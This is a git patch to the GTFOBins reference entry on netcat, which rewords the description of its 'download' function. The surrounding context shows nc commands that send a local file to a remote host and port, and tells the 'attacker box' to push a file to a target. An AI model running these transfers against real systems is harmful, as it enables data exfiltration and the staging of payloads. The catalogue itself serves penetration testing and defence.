From 94f43fb943b5c315546c7cdcd5af9860e594f316 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Sun, 22 Jul 2018 12:47:43 +0100 Subject: [PATCH] Fix nc download description --- _gtfobins/nc.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md index 39dad06..3f49672 100644 --- a/_gtfobins/nc.md +++ b/_gtfobins/nc.md @@ -19,7 +19,7 @@ functions: LFILE=file_to_send nc $RHOST $RPORT < "$LFILE" download: - - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. + - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. code: | LPORT=12345 LFILE=file_to_save